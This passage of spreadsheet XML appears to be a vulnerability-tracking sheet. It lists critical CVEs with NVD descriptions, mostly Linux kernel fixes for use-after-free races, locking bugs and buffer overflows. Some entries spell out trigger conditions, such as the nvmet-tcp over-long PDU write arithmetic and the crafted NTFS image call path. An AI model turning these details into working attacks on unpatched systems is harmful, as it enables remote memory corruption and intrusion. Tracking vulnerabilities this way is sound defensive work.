      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Avoid double completion in async IOCB timeout
qla2x00_async_iocb_timeout() tries to abort a timed-out async IOCB. When
qla24xx_async_abort_cmd() fails, both the SRB_LOGIN_CMD path and the
SRB_CTRL_VP/default path scan outstanding_cmds[] for the SRB and then
call sp-&gt;done(sp, QLA_FUNCTION_TIMEOUT) unconditionally, without checking
whether the SRB was actually found and removed.
If the response ISR completes the same handle first, it removes the SRB
under qp_lock_ptr and runs sp-&gt;done() -&gt; complete(sp-&gt;comp). The
submitter qla24xx_control_vp() wakes from wait_for_completion(), clears
sp-&gt;comp, drops its reference and returns, reclaiming the on-stack
completion. The timer reference keeps the SRB alive across the timeout
handler, but not the submitter's stack. The timeout then issues a second
sp-&gt;done() -&gt; qla_ctrlvp_sp_done(), which evaluates "if (sp-&gt;comp)
complete(sp-&gt;comp)"; with the pointer loaded before the submitter's NULL
store, complete() writes into the freed stack frame, a use-after-free.
Track whether this path removed the SRB from outstanding_cmds and only
call sp-&gt;done() when it did, so the command is completed exactly once by
whichever path owns it. This mirrors the sp_found guard already used in
qla24xx_abort_iocb_timeout().</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89847</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89857</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Hold qpair lock when sending NVMe LS reject
qla_nvme_ls_reject_iocb() allocates from and advances the request ring
through __qla2x00_alloc_iocbs() (which assumes the hardware_lock is
held) and qla2x00_start_iocbs() (which advances the ring and rings the
request-in doorbell), but takes no lock itself. Two of its callers
invoke it without the producer lock held:
 - qla_nvme_xmt_ls_rsp(), the NVMe-FC .xmt_ls_rsp transport callback, on
   its error path, and
 - qla2xxx_process_purls_pkt(), run from the purex work/DPC context.
Both use ha-&gt;base_qpair, whose qp_lock_ptr is hardware_lock, so they can
run concurrently with normal I/O submission on the base ring and corrupt
the ring producer state, leading to duplicated or dropped commands. The
third caller, qla2xxx_process_purls_iocb(), runs inside
qla24xx_process_response_queue() with the qpair lock already held and is
safe; that is also why the lock cannot be taken inside the helper itself
(it would recursively re-acquire hardware_lock on the response path).
Take qp_lock_ptr around the two unlocked callers and document the helper
as caller-locked. Both run in process context, so spin_lock_irqsave() is
used and nothing in the locked region sleeps.</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89857</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89969</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet-tcp: fix out-of-bounds write when receiving an over-long PDU
nvmet_tcp_try_recv_pdu() reads a PDU header into the fixed 128-byte
queue-&gt;pdu union, then computes the remaining payload length as
	queue-&gt;left = hdr-&gt;hlen - queue-&gt;offset + hdgst;
and reads that many more bytes into &amp;queue-&gt;pdu + queue-&gt;offset, without
ever bounding the result against sizeof(queue-&gt;pdu).
A struct nvme_tcp_icreq_pdu is itself 128 bytes, exactly the size of the
union. Once a header digest has been negotiated (hdgst = 4), a second
ICReq passes the hlen == nvmet_tcp_pdu_size() check but yields
queue-&gt;left = 128 - 8 + 4 = 124, so bytes 8..132 are written into the
128-byte buffer -- 4 bytes past its end, over queue-&gt;hdr_digest and
queue-&gt;data_digest. Those bytes are attacker-controlled (an ICReq
carries no digest), and the duplicate ICReq is only rejected later,
after the overflow. A remote unauthenticated host can thus corrupt
kernel memory adjacent to the receive buffer.
Reject any PDU whose declared length would read past the end of
queue-&gt;pdu before the second recv.</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89969</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89970</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet-auth: Synchronize timeout work during SQ teardown
nvmet_auth_sq_free() cancels auth_expired_work with
cancel_delayed_work(). If the work has already started, cancellation does
not wait for the callback. Transport teardown can consequently free or
reuse the queue containing struct nvmet_sq while
nvmet_auth_expired_work() still accesses that SQ.
Add a teardown-specific helper that synchronously drains the delayed work
before freeing authentication state, and use it from nvmet_sq_destroy().
Keep the non-synchronous helper for in-band authentication state cleanup,
where the SQ owner remains alive.</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89970</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89972</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: add missing SRCU grace period in error path
nvme_alloc_ns() error path at out_unlink_ns removes ns from the
namespace head siblings list with list_del_rcu(&amp;ns-&gt;siblings) but
does not wait for SRCU readers before freeing the namespace struct.
Multipath code iterates the head-&gt;list under srcu_read_lock() in
nvme_find_path() and nvme_mpath_revalidate_paths(), so a concurrent
reader can still hold a reference to ns when kfree(ns) runs.
The normal removal path in nvme_ns_remove() correctly calls
synchronize_srcu(&amp;ns-&gt;head-&gt;srcu) after list_del_rcu() to wait for
in-progress readers. Add the same grace period in the error path.</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89972</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89990</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: lock mutex in ceph_mds_check_access()
MDS session OPEN handling replaces mdsc-&gt;s_cap_auths under
mdsc-&gt;mutex, freeing the previous array and its strings.
ceph_mds_check_access() traverses this array without holding the
mutex.  A concurrent session reopen can therefore free the array while
it is being inspected, resulting in a use-after-free like this:
  Unable to handle kernel paging request at virtual address 003aaad64b2c8bb9
  [...]
  Internal error: Oops: 0000000096000004 [#1]  SMP
  Modules linked in:
  CPU: 56 UID: 2953037534 PID: 1253231 Comm: php-cgi8.4 Not tainted 6.18.45-i2-ampere #1146 NONE
  [..]
  pc : ceph_mds_check_access+0xd4/0x550
  lr : ceph_mds_check_access+0xc8/0x550
  [...]
  Call trace:
   ceph_mds_check_access+0xd4/0x550 (P)
   ceph_atomic_open+0x138/0xbe8
   path_openat+0xa24/0xfa8
   do_filp_open+0x94/0x158
   do_sys_openat2+0x88/0xf8</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89990</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90012</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
spi: Fix DMA mapping ownership on partial map failure
If RX mapping fails after TX mapping succeeds, __spi_map_msg() unmaps
TX but leaves tx_sg_mapped set. If TX mapping fails on a later
transfer, mappings created for earlier transfers remain active.
In both cases, cur_{tx,rx}_dma_dev have not yet been updated because they
are assigned only after every transfer has been mapped. The subsequent
spi_unmap_msg() may therefore unmap the TX mapping again or release
earlier mappings using a NULL or stale device. Using a NULL device can
trigger an oops. An empty SG table does not prevent the NULL dereference
because dma_unmap_sg_attrs() accesses the device before checking the
entry count.
Publish both mapping devices before mapping starts and unwind all
failures through __spi_unmap_msg(). This clears the mapping flags and
releases each mapping once with the device that created it.
Publishing the devices before the loop also refreshes them when no
transfer needs mapping. No mapping flag is set in that case, so current
users do not use the pointers as mapping owners.</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90012</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90036</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during blocked-lock reaping
A bare lock owner -- its only remaining reference a blocked lock on
nn-&gt;blocked_locks_lru -- holds a raw pointer to its nfs4_client but
no reference keeping the client alive. When the per-net laundromat
reaps such a lock, freeing the nbl drops the owner reference
held through flc_owner, and the final nfs4_put_stateowner()
takes the client's cl_lock. Because the laundromat detaches the
nbl first, __destroy_client() no longer finds it, so a concurrent
force_expire_client() can free the client before nfs4_put_stateowner()
runs, dereferencing cl_lock in freed memory.
Pin the client with cl_rpc_users before dropping
nn-&gt;blocked_locks_lock, and skip clients already expiring, whose
blocked locks __destroy_client() frees while holding an owner
reference. Take nn-&gt;client_lock outside nn-&gt;blocked_locks_lock.
Every other site holds nn-&gt;blocked_locks_lock as a leaf, acquiring
no further lock, so placing nn-&gt;client_lock outside it cannot form
a lock-order cycle.</t>
        </is>
      </c>
      <c r="S59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90036</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90037</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during close_lru reaping
An nfs4_openowner left on nn-&gt;close_lru after its final CLOSE keeps
its last closed stateid in oo_last_closed_stid, holding only a raw
pointer to its nfs4_client. The laundromat reaps timed-out entries,
drops nn-&gt;client_lock, and calls nfs4_put_stid(), which dereferences
the client through cl_lock. Nothing pins the client across that
window, so a concurrent force_expire_client() can free it and
nfs4_put_stid() reads freed memory. __destroy_client() hits the same
race, walking clp-&gt;cl_openowners without cl_lock.
Pin the client with cl_rpc_users before dropping client_lock, and
skip clients already expiring. __destroy_client() then cleans up its
own close_lru entries through release_last_closed_stateid(), so
teardown no longer races the laundromat.</t>
        </is>
      </c>
      <c r="S60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90037</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90038</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during export state revocation
nfsd4_revoke_export_states() has the same use-after-free as
nfsd4_revoke_states(): it drops nn-&gt;client_lock across
revoke_one_stid() and the following read of clp-&gt;cl_minorversion, but
the stateid reference it holds does not pin the client.  A teardown
racing the dropped lock can free the client while revoke_one_stid()
still dereferences it.
exportfs -u drives this path through NFSD_CMD_UNLOCK_EXPORT, so an
administrator removing an export can race a client expiry.
Skip a client that is already expiring and otherwise pin it with
cl_rpc_users under client_lock before dropping the lock, matching
nfsd4_revoke_states().</t>
        </is>
      </c>
      <c r="S61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90038</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90042</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: properly decrypt filenames in vmalloc() buffers
The fscrypt subsystem uses the scatterlist crypto API, inheriting its
requirement that any buffers are in the linear mapping region. However,
the messenger client uses kvmalloc() to create buffers for messages,
which will occasionally place those buffers in the vmalloc() region when
physical memory fragmentation doesn't permit a large enough kmalloc().
The various callers of ceph_fname_to_usr() directly pass (slices of) raw
messages from the MDS without considering that the messages may be in
vmalloc() buffers, resulting in oopses especially on non-x86 platforms
(see 'Closes:' for more details and a reproducer).
Make ceph_fname_to_usr() explicitly tolerant of vmalloc()-allocated
fname-&gt;ctext, fname-&gt;name, and/or oname-&gt;name buffers, using `tname`
(which, when non-null, must be a linear address; when null, is briefly
allocated as necessary) as a bounce buffer to avoid passing any
inappropriate addresses to fscrypt_fname_disk_to_usr().
Additionally change parse_reply_info_readdir() -- the only function to
supply its own `tname` -- to follow the new "tname must never come from
vmalloc()" rule by passing NULL when the message is not in the linear
region. Though this causes a per-dentry kmalloc()+kfree(), this overhead
exists only when processing the minority of messages that spill into
vmalloc(). My (crude) testing puts this at only about 1 in 8,000 readdir
messages. Still, if the overhead proves unreasonable in the future, it
is easy enough to mitigate: a future change could allocate a bounce
buffer in parse_reply_info_readdir() and use that as `tname` instead.</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90042</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90048</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: fix slab-out-of-bounds write in ni_create_attr_list()
ni_create_attr_list() allocates a fixed buffer of al_aligned(record_size)
(== record_size) bytes and then walks every attribute of the primary MFT
record, writing one ATTR_LIST_ENTRY per attribute and advancing the cursor
by le_size(name_len), with no check against the end of the buffer; the
total size is only computed after the loop.
A minimum-size resident attribute occupies SIZEOF_RESIDENT (0x18 = 24)
bytes on disk, but an unnamed attribute expands to le_size(0) (0x20 = 32)
bytes in the list.  Because the number of attributes in a record is not
bounded (mi_enum_attr() accepts arbitrarily many equal-type, nameless
minimum-size attributes), a crafted record packed with such attributes
produces a list larger than record_size and overflows the heap buffer.
This is reachable from a crafted, loop-mounted NTFS image: opening the file
and adding an attribute (e.g. via setxattr) drives ntfs_set_ea() -&gt;
ni_insert_resident() -&gt; ni_insert_attr() -&gt; ni_ins_attr_ext() -&gt;
ni_create_attr_list().
  BUG: KASAN: slab-out-of-bounds in ni_create_attr_list+0xc48/0x1058
  Write of size 4 at addr ffff000008984c00 by task setfattr/345
   ni_create_attr_list+0xc48/0x1058
   ni_ins_attr_ext+0x510/0x7c0
   ni_insert_attr+0x3f8/0x70c
   ni_insert_resident+0xc8/0x3b0
   ntfs_set_ea+0x66c/0xd28
   ntfs_setxattr+0x4d8/0x5b0
   __arm64_sys_setxattr+0xa4/0x124
  Allocated by task 345:
   ni_create_attr_list+0x188/0x1058
  The buggy address belongs to the cache kmalloc-1k of size 1024
  (the write lands at object+1024).
Size the buffer from the actual attributes instead of assuming a single
record_size is always enough.</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90048</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91843</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>cve@checkpoint.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>A stack overflow during the unauthenticated login process may allow an attacker to run arbitrary code remotely with root privileges.</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91843</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
